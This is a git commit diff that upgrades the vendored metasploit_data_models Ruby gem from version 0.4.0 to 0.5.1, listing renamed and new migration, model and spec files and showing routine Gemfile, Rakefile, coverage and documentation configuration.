lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb 
create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/engine.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/metasploit_data_models.gemspec (88%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/routes.rb (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/spec_helper.rb (96%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.3.0.gemspec => metasploit_data_models-0.5.1.gemspec} (72%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile deleted file mode 100755 index b72e01d066..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile +++ /dev/null 
@@ -1,10 +0,0 @@
-source "http://rubygems.org"
-
-# Specify your gem's dependencies in metasploit_data_models.gemspec
-gemspec
-
-group :test do
- # rails is only used for testing with a dummy application in spec/dummy
- gem 'rails'
- gem 'rspec-rails'
-end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
deleted file mode 100755
index ccea92f08e..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
+++ /dev/null
@@ -1,7 +0,0 @@
-require 'bundler/gem_tasks'
-require 'rspec/core/rake_task'
-
-RSpec::Core::RakeTask.new(:spec)
-
-task :default => :spec
-
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
deleted file mode 100755
index 3d938d3ef9..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
+++ /dev/null
@@ -1,16 +0,0 @@
-class Mdm::WebVuln < ActiveRecord::Base
- #
- # Relations
- #
-
- belongs_to :web_site, :class_name => 'Mdm::WebSite'
-
- #
- # Serializations
- #
-
- serialize :params, MetasploitDataModels::Base64Serializer.new
-
- ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
-end
-
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
deleted file mode 100755
index cf7d89cc68..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
+++ /dev/null
@@ -1,7 +0,0 @@ -module MetasploitDataModels - # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API - # is considered unstable because the database migrations are still in metasploit-framework and certain models may not - # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API - # the version should remain below 1.0.0 - VERSION = '0.4.0' -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore similarity index 78% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore index e5b2a024e4..9cf3f2824c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore @@ -6,13 +6,19 @@ *.gem # Rubymine project configuration .idea +# logs +*.log # Don't check in rvmrc since this is a gem .rvmrc +# YARD database +.yardoc +# coverage report directory for simplecov/Rubymine +coverage +# generated yardocs +doc # Installed gem versions. Not stored for the same reasons as .rvmrc Gemfile.lock # Packaging directory for builds pkg/* # Database configuration (with passwords) for specs spec/dummy/config/database.yml -# logs -*.log diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov new file mode 100644 index 0000000000..c46d9aaf94 --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov
@@ -0,0 +1,38 @@
+# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine. This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+ SimpleCov.start
+end
+
+SimpleCov.configure do
+ load_adapter('rails')
+
+ # ignore this file
+ add_filter '.simplecov'
+
+ #
+ # Changed Files in Git Group
+ # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+ #
+
+ untracked = `git ls-files --exclude-standard --others`
+ unstaged = `git diff --name-only`
+ staged = `git diff --name-only --cached`
+ all = untracked + unstaged + staged
+ changed_filenames = all.split("\n")
+
+ add_group 'Changed' do |source_file|
+ changed_filenames.detect { |changed_filename|
+ source_file.filename.end_with?(changed_filename)
+ }
+ end
+
+ #
+ # Specs are reported on to ensure that all examples are being run and all
+ # lets, befores, afters, etc are being used.
+ #
+
+ add_group 'Specs', 'spec'
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts
new file mode 100644
index 0000000000..5d51dac244
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts
@@ -0,0 +1,4 @@
+--markup markdown
+--protected
+{app,lib}/**/*.rb
+db/migrate/*.rb
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile
new file mode 100755
index 0000000000..c4e6b487cb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile
@@ -0,0 +1,22 @@
+source "http://rubygems.org"
+
+# Specify your gem's dependencies in metasploit_data_models.gemspec
+gemspec
+
+# used by dummy application
+group :development, :test do
+ # supplies factories for producing model instance for specs
+ gem 'factory_girl_rails'
+ # rails is only used for the dummy application in spec/dummy
+ gem 'rails'
+end
+
+group :test do
+ # In a full rails project, factory_girl_rails would be in both the :development, and :test group, but since we only
+ # want rails in :test, factory_girl_rails must also only be in :test.
+ # add matchers from shoulda, such as validates_presence_of, which are useful for testing validations
+ gem 'shoulda-matchers'
+ # code coverage of tests
+ gem 'simplecov', :require => false
+ gem 'rspec-rails'
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile
new file mode 100755
index 0000000000..b582299d61
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile
@@ -0,0 +1,20 @@
+#!/usr/bin/env rake
+begin
+ require 'bundler/setup'
+rescue LoadError
+ puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
+end
+
+
+APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__)
+load 'rails/tasks/engine.rake'
+
+Bundler::GemHelper.install_tasks
+
+require 'rspec/core/rake_task'
+
+RSpec::Core::RakeTask.new(:spec)
+task :default => :spec
+
+load 'lib/tasks/yard.rake'
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb 
